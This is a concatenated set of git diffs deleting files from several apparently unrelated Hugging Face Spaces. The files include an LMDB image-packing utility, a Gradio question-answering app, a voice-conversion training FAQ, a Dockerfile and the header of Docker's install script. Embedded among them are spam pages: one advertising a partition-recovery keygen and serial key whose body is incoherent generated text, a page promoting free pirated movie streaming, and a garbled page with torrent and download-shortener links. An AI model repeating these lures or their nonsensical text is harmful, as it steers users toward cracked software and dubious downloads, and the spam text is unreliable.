for more details. - - The meta_info.txt is a specified txt file to record the meta information - of our datasets. It will be automatically created when preparing - datasets by our provided dataset tools. - Each line in the txt file records 1)image name (with extension), - 2)image shape, and 3)compression level, separated by a white space. - - For example, the meta information could be: - `000_00000000.png (720,1280,3) 1`, which means: - 1) image name (with extension): 000_00000000.png; - 2) image shape: (720,1280,3); - 3) compression level: 1 - - We use the image name without extension as the lmdb key. - - If `multiprocessing_read` is True, it will read all the images to memory - using multiprocessing. Thus, your server needs to have enough memory. - - Args: - data_path (str): Data path for reading images. - lmdb_path (str): Lmdb save path. - img_path_list (str): Image path list. - keys (str): Used for lmdb keys. - batch (int): After processing batch images, lmdb commits. - Default: 5000. - compress_level (int): Compress level when encoding images. Default: 1. - multiprocessing_read (bool): Whether use multiprocessing to read all - the images to memory. Default: False. - n_thread (int): For multiprocessing. - map_size (int | None): Map size for lmdb env. If None, use the - estimated size from images. 
Default: None - """ - - assert len(img_path_list) == len(keys), ('img_path_list and keys should have the same length, ' - f'but got {len(img_path_list)} and {len(keys)}') - print(f'Create lmdb for {data_path}, save to {lmdb_path}...') - print(f'Totoal images: {len(img_path_list)}') - if not lmdb_path.endswith('.lmdb'): - raise ValueError("lmdb_path must end with '.lmdb'.") - if osp.exists(lmdb_path): - print(f'Folder {lmdb_path} already exists. Exit.') - sys.exit(1) - - if multiprocessing_read: - # read all the images to memory (multiprocessing) - dataset = {} # use dict to keep the order for multiprocessing - shapes = {} - print(f'Read images with multiprocessing, #thread: {n_thread} ...') - pbar = tqdm(total=len(img_path_list), unit='image') - - def callback(arg): - """get the image data and update pbar.""" - key, dataset[key], shapes[key] = arg - pbar.update(1) - pbar.set_description(f'Read {key}') - - pool = Pool(n_thread) - for path, key in zip(img_path_list, keys): - pool.apply_async(read_img_worker, args=(osp.join(data_path, path), key, compress_level), callback=callback) - pool.close() - pool.join() - pbar.close() - print(f'Finish reading {len(img_path_list)} images.') - - # create lmdb environment - if map_size is None: - # obtain data size for one image - img = cv2.imread(osp.join(data_path, img_path_list[0]), cv2.IMREAD_UNCHANGED) - _, img_byte = cv2.imencode('.png', img, [cv2.IMWRITE_PNG_COMPRESSION, compress_level]) - data_size_per_img = img_byte.nbytes - print('Data size per image is: ', data_size_per_img) - data_size = data_size_per_img * len(img_path_list) - map_size = data_size * 10 - - env = lmdb.open(lmdb_path, map_size=map_size) - - # write data to lmdb - pbar = tqdm(total=len(img_path_list), unit='chunk') - txn = env.begin(write=True) - txt_file = open(osp.join(lmdb_path, 'meta_info.txt'), 'w') - for idx, (path, key) in enumerate(zip(img_path_list, keys)): - pbar.update(1) - pbar.set_description(f'Write {key}') - key_byte = key.encode('ascii') - if multiprocessing_read: - img_byte = dataset[key] - h, w, c = shapes[key] - else: - _, img_byte, img_shape = read_img_worker(osp.join(data_path, path), key, compress_level) - h, w, c = img_shape - - txn.put(key_byte, img_byte) - # write meta information - txt_file.write(f'{key}.png ({h},{w},{c}) {compress_level}\n') - if idx % batch == 0: - txn.commit() - txn = env.begin(write=True) - pbar.close() - txn.commit() - env.close() - txt_file.close() - print('\nFinish writing lmdb.') - - -def read_img_worker(path, key, compress_level): - """Read image worker. - - Args: - path (str): Image path. - key (str): Image key. - compress_level (int): Compress level when encoding images. - - Returns: - str: Image key. - byte: Image byte. - tuple[int]: Image shape. - """ - - img = cv2.imread(path, cv2.IMREAD_UNCHANGED) - # deal with `libpng error: Read Error` - if img is None: - print(f'To deal with `libpng error: Read Error`, use PIL to load {path}') - from PIL import Image - import numpy as np - img = Image.open(path) - img = np.asanyarray(img) - img = img[:, :, [2, 1, 0]] - - if img.ndim == 2: - h, w = img.shape - c = 1 - else: - h, w, c = img.shape - _, img_byte = cv2.imencode('.png', img, [cv2.IMWRITE_PNG_COMPRESSION, compress_level]) - return (key, img_byte, (h, w, c)) - - -class LmdbMaker(): - """LMDB Maker. - - Args: - lmdb_path (str): Lmdb save path. - map_size (int): Map size for lmdb env. Default: 1024 ** 4, 1TB. - batch (int): After processing batch images, lmdb commits. - Default: 5000. 
- compress_level (int): Compress level when encoding images. Default: 1. - """ - - def __init__(self, lmdb_path, map_size=1024**4, batch=5000, compress_level=1): - if not lmdb_path.endswith('.lmdb'): - raise ValueError("lmdb_path must end with '.lmdb'.") - if osp.exists(lmdb_path): - print(f'Folder {lmdb_path} already exists. Exit.') - sys.exit(1) - - self.lmdb_path = lmdb_path - self.batch = batch - self.compress_level = compress_level - self.env = lmdb.open(lmdb_path, map_size=map_size) - self.txn = self.env.begin(write=True) - self.txt_file = open(osp.join(lmdb_path, 'meta_info.txt'), 'w') - self.counter = 0 - - def put(self, img_byte, key, img_shape): - self.counter += 1 - key_byte = key.encode('ascii') - self.txn.put(key_byte, img_byte) - # write meta information - h, w, c = img_shape - self.txt_file.write(f'{key}.png ({h},{w},{c}) {self.compress_level}\n') - if self.counter % self.batch == 0: - self.txn.commit() - self.txn = self.env.begin(write=True) - - def close(self): - self.txn.commit() - self.env.close() - self.txt_file.close() diff --git a/spaces/lamini/instruct-playground/README.md b/spaces/lamini/instruct-playground/README.md deleted file mode 100644 index d3a0e70898c6508199c43898d4d69331b73bd4b3..0000000000000000000000000000000000000000 --- a/spaces/lamini/instruct-playground/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Instruct Playground -emoji: 📉 -colorFrom: yellow -colorTo: purple -sdk: gradio -sdk_version: 3.27.0 -app_file: app.py -pinned: false -license: cc-by-4.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/legacy107/flan-t5-large-ia3-cpgqa/app.py b/spaces/legacy107/flan-t5-large-ia3-cpgqa/app.py deleted file mode 100644 index 409c24fe1f8a1f458b5370d6aa76d5f2335335d2..0000000000000000000000000000000000000000 --- a/spaces/legacy107/flan-t5-large-ia3-cpgqa/app.py +++ /dev/null @@ -1,129 +0,0 @@ -import gradio as gr -from gradio.components import Textbox, Checkbox -from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, T5ForConditionalGeneration -from peft import PeftModel, PeftConfig -import torch -import datasets - -# Load your fine-tuned model and tokenizer -model_name = "google/flan-t5-large" -peft_name = "legacy107/flan-t5-large-ia3-cpgQA" -tokenizer = AutoTokenizer.from_pretrained(model_name) -pretrained_model = T5ForConditionalGeneration.from_pretrained("google/flan-t5-large") -model = T5ForConditionalGeneration.from_pretrained("google/flan-t5-large") -model = PeftModel.from_pretrained(model, peft_name) - -peft_name = "legacy107/flan-t5-large-ia3-bioasq-paraphrase" -peft_config = PeftConfig.from_pretrained(peft_name) -paraphrase_model = AutoModelForSeq2SeqLM.from_pretrained(model_name) -paraphrase_model = PeftModel.from_pretrained(paraphrase_model, peft_name) - -max_length = 512 -max_target_length = 200 - -# Load your dataset -dataset = datasets.load_dataset("minh21/cpgQA-v1.0-unique-context-test-10-percent-validation-10-percent", split="test") -# dataset = dataset.shuffle() -dataset = dataset.select([32, 7, 92, 8, 108, 51, 64, 84, 93, 94]) - - -def paraphrase_answer(question, answer, use_pretrained=False): - # Combine question and context - input_text = f"question: {question}. 
Paraphrase the answer to make it more natural answer: {answer}" - - # Tokenize the input text - input_ids = tokenizer( - input_text, - return_tensors="pt", - padding="max_length", - truncation=True, - max_length=max_length, - ).input_ids - - # Generate the answer - with torch.no_grad(): - if use_pretrained: - generated_ids = pretrained_model.generate(input_ids=input_ids, max_new_tokens=max_target_length) - else: - generated_ids = paraphrase_model.generate(input_ids=input_ids, max_new_tokens=max_target_length) - - # Decode and return the generated answer - paraphrased_answer = tokenizer.decode(generated_ids[0], skip_special_tokens=True) - - return paraphrased_answer - - -# Define your function to generate answers -def generate_answer(question, context, ground_truth, do_pretrained, do_natural, do_pretrained_natural): - # Combine question and context - input_text = f"question: {question} context: {context}" - - # Tokenize the input text - input_ids = tokenizer( - input_text, - return_tensors="pt", - padding="max_length", - truncation=True, - max_length=max_length, - ).input_ids - - # Generate the answer - with torch.no_grad(): - generated_ids = model.generate(input_ids=input_ids, max_new_tokens=max_target_length) - - # Decode and return the generated answer - generated_answer = tokenizer.decode(generated_ids[0], skip_special_tokens=True) - - # Paraphrase answer - paraphrased_answer = "" - if do_natural: - paraphrased_answer = paraphrase_answer(question, generated_answer) - - # Get pretrained model's answer - pretrained_answer = "" - if do_pretrained: - with torch.no_grad(): - pretrained_generated_ids = pretrained_model.generate(input_ids=input_ids, max_new_tokens=max_target_length) - pretrained_answer = tokenizer.decode(pretrained_generated_ids[0], skip_special_tokens=True) - - # Get pretrained model's natural answer - pretrained_paraphrased_answer = "" - if do_pretrained_natural: - pretrained_paraphrased_answer = paraphrase_answer(question, generated_answer, True) - - return generated_answer, paraphrased_answer, pretrained_answer, pretrained_paraphrased_answer - - -# Define a function to list examples from the dataset -def list_examples(): - examples = [] - for example in dataset: - context = example["context"] - question = example["question"] - answer = example["answer_text"] - examples.append([question, context, answer, True, True, True]) - return examples - - -# Create a Gradio interface -iface = gr.Interface( - fn=generate_answer, - inputs=[ - Textbox(label="Question"), - Textbox(label="Context"), - Textbox(label="Ground truth"), - Checkbox(label="Include pretrained model's answer"), - Checkbox(label="Include natural answer"), - Checkbox(label="Include pretrained model's natural answer") - ], - outputs=[ - Textbox(label="Generated Answer"), - Textbox(label="Natural Answer"), - Textbox(label="Pretrained Model's Answer"), - Textbox(label="Pretrained Model's Natural Answer") - ], - examples=list_examples() -) - -# Launch the Gradio interface -iface.launch() \ No newline at end of file diff --git a/spaces/leurez/moss/src/store/modules/auth/helper.ts b/spaces/leurez/moss/src/store/modules/auth/helper.ts deleted file mode 100644 index c16e0feda1b3ba8e8670aa1ffcbe44aa7c41b3a8..0000000000000000000000000000000000000000 --- a/spaces/leurez/moss/src/store/modules/auth/helper.ts +++ /dev/null @@ -1,15 +0,0 @@ -import { ss } from '@/utils/storage' - -const LOCAL_NAME = 'SECRET_TOKEN' - -export function getToken() { - return ss.get(LOCAL_NAME) -} - -export function setToken(token: string) { - return 
ss.set(LOCAL_NAME, token) -} - -export function removeToken() { - return ss.remove(LOCAL_NAME) -} diff --git a/spaces/lewispons/GrammarGuru/src/visualization/__init__.py b/spaces/lewispons/GrammarGuru/src/visualization/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/lewiswu1209/MockingBird/utils/argutils.py b/spaces/lewiswu1209/MockingBird/utils/argutils.py deleted file mode 100644 index db41683027173517c910e3b259f8da48207dcb38..0000000000000000000000000000000000000000 --- a/spaces/lewiswu1209/MockingBird/utils/argutils.py +++ /dev/null @@ -1,40 +0,0 @@ -from pathlib import Path -import numpy as np -import argparse - -_type_priorities = [ # In decreasing order - Path, - str, - int, - float, - bool, -] - -def _priority(o): - p = next((i for i, t in enumerate(_type_priorities) if type(o) is t), None) - if p is not None: - return p - p = next((i for i, t in enumerate(_type_priorities) if isinstance(o, t)), None) - if p is not None: - return p - return len(_type_priorities) - -def print_args(args: argparse.Namespace, parser=None): - args = vars(args) - if parser is None: - priorities = list(map(_priority, args.values())) - else: - all_params = [a.dest for g in parser._action_groups for a in g._group_actions ] - priority = lambda p: all_params.index(p) if p in all_params else len(all_params) - priorities = list(map(priority, args.keys())) - - pad = max(map(len, args.keys())) + 3 - indices = np.lexsort((list(args.keys()), priorities)) - items = list(args.items()) - - print("Arguments:") - for i in indices: - param, value = items[i] - print(" {0}:{1}{2}".format(param, ' ' * (pad - len(param)), value)) - print("") - \ No newline at end of file diff --git a/spaces/librarian-bots/dashboard/description.html b/spaces/librarian-bots/dashboard/description.html deleted file mode 100644 index a9831bbdda696711afd7b70b7417a3e6859cfbd9..0000000000000000000000000000000000000000 --- a/spaces/librarian-bots/dashboard/description.html +++ /dev/null @@ -1,21 +0,0 @@ - - - - - - - - -

          Librarian Bot Dashboard

          -Avatar -

Librarian-bot is a bot that suggests changes to metadata for models and datasets hosted on the hub. This dashboard gives an overview of these pull requests.

          - - - diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Calaveras Literarias Para Maestros De Matematicas Cortas ((NEW)).md b/spaces/lincquiQcaudo/Top-20-Diffusion/Calaveras Literarias Para Maestros De Matematicas Cortas ((NEW)).md deleted file mode 100644 index dae7ec672c189500c2351275b269ced4b0fddde8..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Calaveras Literarias Para Maestros De Matematicas Cortas ((NEW)).md +++ /dev/null @@ -1,15 +0,0 @@ -

          calaveras literarias para maestros de matematicas cortas


          Downloadhttps://bytlly.com/2uGwBV



          -
          -calaveras literarias para maestros de matematicas cortas Saudagar full mp4 movie download Apne English Dubbed Torrent Download ... -Read morecalaveras literarias para maestros de matematicas cortas Saudagar full movie mp4 download Apne English Dubbed Torrent Download ... ... -Torrent, .torrent, .torrent, .torrent, .torrent, .torrent, , ... -Hide -Movies series for free. -Download for free HERE Download for free here. -All films. -To read ... -The plot revolves around a young family that has moved into a new apartment on the outskirts of the city. -Read moreMovies serials for free. 8a78ff9644
          -
          -
          -

          diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/HD Online Player (Ala Ela Telugu Movie Free Download U).md b/spaces/lincquiQcaudo/Top-20-Diffusion/HD Online Player (Ala Ela Telugu Movie Free Download U).md deleted file mode 100644 index 5de42ef247800fa99c73a26f87b87e8d2476b72c..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/HD Online Player (Ala Ela Telugu Movie Free Download U).md +++ /dev/null @@ -1,82 +0,0 @@ -## HD Online Player (Ala Ela Telugu Movie Free Download U) - - - - - - - - - -**Click Here ————— [https://fienislile.blogspot.com/?download=2tyEkt](https://fienislile.blogspot.com/?download=2tyEkt)** - - - - - - - - - - - - - -# How to Watch Ala Ela Telugu Movie Online for Free - - - -If you are a fan of Telugu comedy movies, you might have heard of Ala Ela, a 2014 film directed by Aneesh Krishna and starring Rahul Ravindran, Hebah Patel, Vennela Kishore and others. The movie is about a group of friends who go on a road trip to attend a wedding and end up in hilarious situations along the way. - - - -Ala Ela was a sleeper hit at the box office and received positive reviews from critics and audiences alike. The movie is full of witty dialogues, funny scenes and heartwarming moments that will make you laugh and cry. If you missed watching Ala Ela in theatres or want to watch it again, you might be wondering how to watch it online for free. - - - -Well, you are in luck because we have found a way for you to watch Ala Ela Telugu movie online for free using an HD online player. All you need is a device with an internet connection and a browser that supports HTML5 video. Here are the steps to follow: - - - -1. Go to [example.com](https://example.com), a website that offers free streaming of Telugu movies in HD quality. - -2. Search for Ala Ela in the search bar or browse through the categories to find it. - -3. Click on the movie poster to open the HD online player. - -4. Enjoy watching Ala Ela Telugu movie online for free without any interruptions or ads. - - - -That's it! You can now watch Ala Ela Telugu movie online for free using an HD online player. You can also download the movie to your device if you want to watch it offline later. However, we recommend that you watch it online as downloading may be illegal in some regions. - - - -We hope you enjoy watching Ala Ela Telugu movie online for free using an HD online player. If you liked this article, please share it with your friends and family who might also be interested in watching Ala Ela. Also, let us know your feedback and suggestions in the comments section below. Thank you for reading! - - - -If you are wondering what makes Ala Ela Telugu movie so special and entertaining, here are some of the reasons why you should watch it: - - - -- The movie has a fresh and original story that is not a remake or a copy of any other film. The movie is based on a real-life incident that happened to the director and his friends. - -- The movie has a talented and charming cast that delivers excellent performances. Rahul Ravindran and Hebah Patel play the lead roles of Karthik and Ananya, who fall in love during the road trip. Vennela Kishore and Bhanu Sri Mehra play the roles of Shiva and Shruti, who are already married but face some issues in their relationship. Kushi and Shani Salmon play the roles of Maya and Nelson, who are the bride and groom whose wedding the friends are attending. - -- The movie has a lot of comedy and humor that will make you laugh out loud. 
The movie is full of hilarious situations, witty dialogues, funny expressions and comic timing. The movie also has some spoof scenes that parody popular Telugu movies and actors. - -- The movie has some emotional and romantic scenes that will touch your heart. The movie shows how the friends bond with each other and overcome their personal problems. The movie also shows how Karthik and Ananya fall in love and face some challenges in their relationship. - -- The movie has some beautiful songs and music that will enhance your mood. The movie has six songs composed by Bheems Ceciroleo, who also sang some of them. The songs are catchy, melodious and suit the mood of the scenes. The songs are also well picturized and choreographed. - - - -These are some of the reasons why you should watch Ala Ela Telugu movie online for free using an HD online player. We are sure that you will enjoy this movie as much as we did. So, what are you waiting for? Go to [example.com](https://example.com) and watch Ala Ela Telugu movie online for free now! - - 145887f19f - - - - - diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Hetman Partition Recovery V1.0 With Key [iahq76] Serial Key Keygen UPD.md b/spaces/lincquiQcaudo/Top-20-Diffusion/Hetman Partition Recovery V1.0 With Key [iahq76] Serial Key Keygen UPD.md deleted file mode 100644 index 597e2e752927d4e8c2d097b1c94c2c44fb21aace..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Hetman Partition Recovery V1.0 With Key [iahq76] Serial Key Keygen UPD.md +++ /dev/null @@ -1,6 +0,0 @@ -

          Hetman Partition Recovery v1.0 with Key [iahq76] Serial Key keygen


          DOWNLOAD →→→ https://bytlly.com/2uGwdE



          - -Networks. The notebook is run on Cloud AI Notebooks. The output is still the same and the output of the output depends on the input. 1. PyTorch in Cloud ML is a high-level ML library built on PyTorch. Notebooks on GCloud for Data Science. Let's say you have a dataset with columns X, Y, and Z. There are different ways to setup a notebook on GCP: Download a Docker container from. py but the notebook will still be run in the Cloud ML Notebook runtime. Z. 0 3. Data Review. I have a sample pandas dataframe df which has columns titled 'A', 'B' and 'C'. A Pandas dataframe is a dictionary that contains rows (of data) and columns (of data). A Data frame is a table that stores tabular data. X. Downloading to the Google Cloud Platform (GCP) is free. The data looks like this: The output is expected to be in a table-like structure, similar to the input. Get started with Cloud ML by building AI tools and services that work right from your browser. Selecting Dataset from the quick select menu allows you to choose from a list of pre-trained models you’ve downloaded from the Google Cloud Platform (GCP). Log in to the notebook and select the the cell containing the cell_type, i. Data Review. This. At this point, note that the output is in a tabular structure. The notebooks are accessible online at Training a deep learning model involves defining a task, training a deep learning model and deploying it on a Cloud Platform. Cloud ML also has free on-demand models that are compatible with Cloud ML Pipelines and can be used by services in the Cloud ML Platform. You can also download these files and use them in a notebook. You can see the changes in the data by executing select(list). Let's say you have a dataset with columns X, Y, and Z. We're going to utilize this setup to build a simple model that will help you. This notebook will use the numpy_utils. Each row is a vector of predicted values of the predictors X, Y and Z. PyTorch is a deep learning library written in Python. I'm trying to use Cloud ML Notebook to train a multi-label classification model on an image dataset. Click Save. Deploy to the cloud. In this notebook, we will use pytorch, the Python Numpy 4fefd39f24
          -
          -
          -

diff --git a/spaces/lj1995/vocal2guitar/docs/faq.md b/spaces/lj1995/vocal2guitar/docs/faq.md deleted file mode 100644 index 74eff82d9e4f96f50ad0aed628c253d08e16a426..0000000000000000000000000000000000000000 --- a/spaces/lj1995/vocal2guitar/docs/faq.md +++ /dev/null @@ -1,89 +0,0 @@ -## Q1:ffmpeg error/utf8 error. - -Most of the time this is not an ffmpeg problem but an audio path problem;<br>
-If the path ffmpeg reads contains spaces, parentheses or other special characters, an ffmpeg error may occur; if the training-set audio paths contain Chinese characters, a utf8 error may occur when writing filelist.txt;<br>
- -## Q2: One-click training finished but there is no index - -"Training is done. The program is closed." means the model trained successfully; the errors printed immediately afterwards are spurious;<br>
- -If one-click training finishes without an index file whose name starts with "added", the training set may be so large that the index-adding step got stuck; adding the index in batches has since resolved its excessive memory demand. As a temporary workaround, try clicking the "Train index" button again. (A schematic of batched index building follows below.)<br>
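To illustrate the batched index building mentioned above, here is a minimal sketch. It assumes FAISS with 256-dimensional float32 features and 677 inverted lists; these numbers are placeholders chosen for illustration, not the project's fixed settings.

```python
# Illustrative sketch: train a FAISS IVF index once, then add vectors in
# fixed-size batches so the build does not need one huge add() call.
import numpy as np
import faiss

dim, nlist = 256, 677                                   # assumed sizes, for illustration only
feats = np.random.rand(100_000, dim).astype("float32")  # stand-in for extracted features

quantizer = faiss.IndexFlatL2(dim)
index = faiss.IndexIVFFlat(quantizer, dim, nlist)
index.train(feats)

batch = 8192
for start in range(0, feats.shape[0], batch):
    index.add(feats[start:start + batch])               # add one chunk at a time

faiss.write_index(index, "added_example.index")
```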
- -## Q3: Training finished but the training-set voice does not appear for inference -Click "Refresh voice list" and check again. If it is still missing, check whether training reported errors; screenshots of the console and the WebUI, as well as the logs under logs/experiment_name, can all be sent to the developers for review.<br>
- -## Q4: How to share a model -  The pth files stored under rvc_root/logs/experiment_name are not meant to be shared or used for inference; they store the experiment state for reproducibility and for resuming training. The model to share is the 60+MB pth file under the weights folder;<br>
-  Later, weights/exp_name.pth and logs/exp_name/added_xxx.index will be bundled into weights/exp_name.zip to save you from filling in the index path, so share the zip file, not the pth file, unless you want to continue training on a different machine;<br>
-  If you copy/share the several-hundred-MB pth files from the logs folder into the weights folder and force them to be used for inference, you may get errors about missing keys such as f0 and tgt_sr. You need to use the small-model extraction at the bottom of the ckpt tab, choosing manually or automatically (automatic if the relevant information can be found under the local logs) whether to include pitch and the target audio sample rate, and fill in the G-prefixed file as the input path. After extraction, a 60+MB pth file appears under the weights folder and can be selected after refreshing the voice list.<br>
- -## Q5: Connection Error. -You probably closed the console (the black window).<br>
- -## Q6: The WebUI pops up "Expecting value: line 1 column 1 (char 0)". -Please disable the system LAN proxy / global proxy.<br>
- -This means not only the client-side proxy but also the server-side proxy (for example, if you set http_proxy and https_proxy on autodl for academic acceleration, they also need to be unset while using the WebUI; see the snippet below).<br>
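A minimal sketch of clearing those variables for the current Python process before the WebUI starts; the variable names are the standard proxy environment variables, nothing specific to this repository.

```python
# Illustrative sketch: remove proxy settings from the current process
# environment so requests to the local WebUI are not routed through a proxy.
import os

for var in ("http_proxy", "https_proxy", "HTTP_PROXY", "HTTPS_PROXY"):
    os.environ.pop(var, None)  # drop the variable if it is set, otherwise do nothing
```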
- -## Q7: How to train and run inference from the command line, without the WebUI -Training script:<br>
-Run the WebUI once first; the message window will print the exact command lines used for dataset processing and training;<br>
- -Inference script:<br>
          -https://huggingface.co/lj1995/VoiceConversionWebUI/blob/main/myinfer.py
- -Example:<br>
          - -runtime\python.exe myinfer.py 0 "E:\codes\py39\RVC-beta\todo-songs\1111.wav" "E:\codes\py39\logs\mi-test\added_IVF677_Flat_nprobe_7.index" harvest "test.wav" "weights/mi-test.pth" 0.6 cuda:0 True
          - -f0up_key=sys.argv[1]
          -input_path=sys.argv[2]
          -index_path=sys.argv[3]
          -f0method=sys.argv[4]#harvest or pm
          -opt_path=sys.argv[5]
          -model_path=sys.argv[6]
          -index_rate=float(sys.argv[7])
          -device=sys.argv[8]
          -is_half=bool(sys.argv[9])
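As a convenience, the positional arguments listed above can be kept in one place and passed in order. The sketch below simply rebuilds the example command; the interpreter path, file paths and values are the illustrative ones from the example, not required names.

```python
# Illustrative sketch: build and run the myinfer.py command from named values,
# keeping the positional order of sys.argv[1]..sys.argv[9] listed above.
import subprocess

args = {
    "f0up_key": 0,
    "input_path": r"E:\codes\py39\RVC-beta\todo-songs\1111.wav",
    "index_path": r"E:\codes\py39\logs\mi-test\added_IVF677_Flat_nprobe_7.index",
    "f0method": "harvest",                 # harvest or pm
    "opt_path": "test.wav",
    "model_path": "weights/mi-test.pth",
    "index_rate": 0.6,
    "device": "cuda:0",
    "is_half": True,
}

cmd = [r"runtime\python.exe", "myinfer.py"] + [str(v) for v in args.values()]
subprocess.run(cmd, check=True)            # dict order matches the argv order above
```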
- -## Q8: Cuda error/Cuda out of memory. -In rare cases this is a CUDA configuration problem or an unsupported device; most of the time it simply means there is not enough GPU memory (out of memory);<br>
- -For training, reduce the batch size (if reducing it to 1 is still not enough, the only option is a GPU with more memory); for inference, reduce x_pad, x_query, x_center and x_max at the end of config.py as needed. Cards with less than 4GB of memory (for example the 1060 (3G) and various 2GB cards) can be written off; 4GB cards still have a chance.<br>
- -## Q9: What is a good value for total_epoch - -If the training set has poor audio quality and a high noise floor, 20~30 is enough; setting it too high will not let the base model lift the quality of your low-quality training set<br>
-If the training set is high quality, low noise and long, you can raise it; 200 is fine (training is fast, and since you were able to prepare a high-quality training set your GPU is presumably decent too, so a bit more training time is not a concern)<br>
- -## Q10: How much training-set audio is needed -  10min to 50min is recommended<br>
-  Provided the audio quality is high and the noise floor is low, more is better as long as the timbre is consistent and distinctive<br>
-  For a high-grade training set (well trimmed + distinctive timbre), 5min to 10min is also fine; the repository author does this all the time<br>
-  Some people have trained successfully on 1min to 2min of data, but such successes cannot be reproduced by others and have little reference value. They require a training set with a very distinctive timbre (for example a breathy, high-pitched young voice) and high audio quality;<br>
-  Nobody has yet been seen trying (successfully) with less than 1min of data. This kind of stunt is not recommended.<br>
- -## Q11: What is index rate for, and how to set it (explainer) -  If the base model and the inference source have higher audio quality than the training set, they can raise the audio quality of the inference result, but at the possible cost of the timbre drifting toward that of the base model / inference source; this is called "timbre leakage";<br>
-  The index rate is used to reduce/solve timbre leakage. Set to 1, there is in theory no timbre leakage from the inference source, but the audio quality leans more toward the training set. If the training set has lower audio quality than the inference source, raising the index rate may lower the audio quality. Set to 0, retrieval blending is not used to protect the training-set timbre at all;<br>
-  If the training set is high quality and long, you can raise total_epoch; the model then rarely borrows the timbre of the inference source or the base model, "timbre leakage" seldom occurs, index_rate matters little, and you may not even need to build or share the index file. (A schematic of the retrieval blending follows below.)<br>
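The retrieval blending behind the index rate can be pictured as a linear interpolation between the features of the inference source and the nearest-neighbour features looked up in the training-set index. The snippet below is a schematic with made-up shapes, assuming 256-dimensional features; it is not the repository's actual inference code.

```python
# Schematic illustration: index_rate trades off between features retrieved
# from the training-set index and the original features of the inference source.
import numpy as np

def blend(original_feats: np.ndarray, retrieved_feats: np.ndarray, index_rate: float) -> np.ndarray:
    """index_rate=1.0 fully trusts the index; index_rate=0.0 ignores it."""
    return index_rate * retrieved_feats + (1.0 - index_rate) * original_feats

original = np.random.rand(200, 256).astype("float32")   # features of the audio being converted
retrieved = np.random.rand(200, 256).astype("float32")  # nearest-neighbour features from the index
mixed = blend(original, retrieved, index_rate=0.6)
print(mixed.shape)
```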
- -## Q11: How to choose the GPU for inference -Set the card number after device cuda: in config.py;<br>
-The mapping between card numbers and GPUs can be seen in the GPU information box on the training tab.<br>
- -## Q12: How to run inference with a pth saved mid-training -Extract a small model with the option at the very bottom of the ckpt tab.<br>
- - -## Q13: How to interrupt and resume training -At this stage you can only close the WebUI console and double-click go-web.bat to restart the program. The web-page parameters also need to be refreshed and filled in again;<br>
-Resuming: with the same web-page parameters, click "Train model" and training will continue from the last checkpoint.<br>
- -## Q14: Page-file / memory errors during training -Too many processes were started and memory blew up. You may be able to solve it as follows:<br>
-1. Lower the "number of CPU processes used for pitch extraction and data processing" as appropriate;<br>
-2. Manually trim the training-set audio so the clips are not too long.<br>
          - - - diff --git a/spaces/lqy09/GT/Dockerfile b/spaces/lqy09/GT/Dockerfile deleted file mode 100644 index 7a9d79c786c6fa9ad05d580102caebd58baace97..0000000000000000000000000000000000000000 --- a/spaces/lqy09/GT/Dockerfile +++ /dev/null @@ -1,17 +0,0 @@ -# 使用Node.js基础镜像 -FROM node:18 - -# 设置工作目录 -WORKDIR /app - -# 将本地的所有文件复制到工作目录 -COPY . /app/ - -# 安装依赖 -RUN npm install - -# 启动应用程序 -CMD ["node", "app.js"] - -# 暴露端口 -EXPOSE 7860 \ No newline at end of file diff --git a/spaces/ludusc/latent-space-theories/test-docker.sh b/spaces/ludusc/latent-space-theories/test-docker.sh deleted file mode 100644 index ee2ccfb452ea683ed7d007fae7c3e6f135cc35a8..0000000000000000000000000000000000000000 --- a/spaces/ludusc/latent-space-theories/test-docker.sh +++ /dev/null @@ -1,743 +0,0 @@ -#!/bin/sh -set -e -# Docker Engine for Linux installation script. -# -# This script is intended as a convenient way to configure docker's package -# repositories and to install Docker Engine, This script is not recommended -# for production environments. Before running this script, make yourself familiar -# with potential risks and limitations, and refer to the installation manual -# at https://docs.docker.com/engine/install/ for alternative installation methods. -# -# The script: -# -# - Requires `root` or `sudo` privileges to run. -# - Attempts to detect your Linux distribution and version and configure your -# package management system for you. -# - Doesn't allow you to customize most installation parameters. -# - Installs dependencies and recommendations without asking for confirmation. -# - Installs the latest stable release (by default) of Docker CLI, Docker Engine, -# Docker Buildx, Docker Compose, containerd, and runc. When using this script -# to provision a machine, this may result in unexpected major version upgrades -# of these packages. Always test upgrades in a test environment before -# deploying to your production systems. -# - Isn't designed to upgrade an existing Docker installation. When using the -# script to update an existing installation, dependencies may not be updated -# to the expected version, resulting in outdated versions. -# -# Source code is available at https://github.com/docker/docker-install/ -# -# Usage -# ============================================================================== -# -# To install the latest stable versions of Docker CLI, Docker Engine, and their -# dependencies: -# -# 1. download the script -# -# $ curl -fsSL https://get.docker.com -o install-docker.sh -# -# 2. verify the script's content -# -# $ cat install-docker.sh -# -# 3. run the script with --dry-run to verify the steps it executes -# -# $ sh install-docker.sh --dry-run -# -# 4. run the script either as root, or using sudo to perform the installation. -# -# $ sudo sh install-docker.sh -# -# Command-line options -# ============================================================================== -# -# --version -# Use the --version option to install a specific version, for example: -# -# $ sudo sh install-docker.sh --version 23.0 -# -# --channel -# -# Use the --channel option to install from an alternative installation channel. -# The following example installs the latest versions from the "test" channel, -# which includes pre-releases (alpha, beta, rc): -# -# $ sudo sh install-docker.sh --channel test -# -# Alternatively, use the script at https://test.docker.com, which uses the test -# channel as default. -# -# --mirror -# -# Use the --mirror option to install from a mirror supported by this script. 
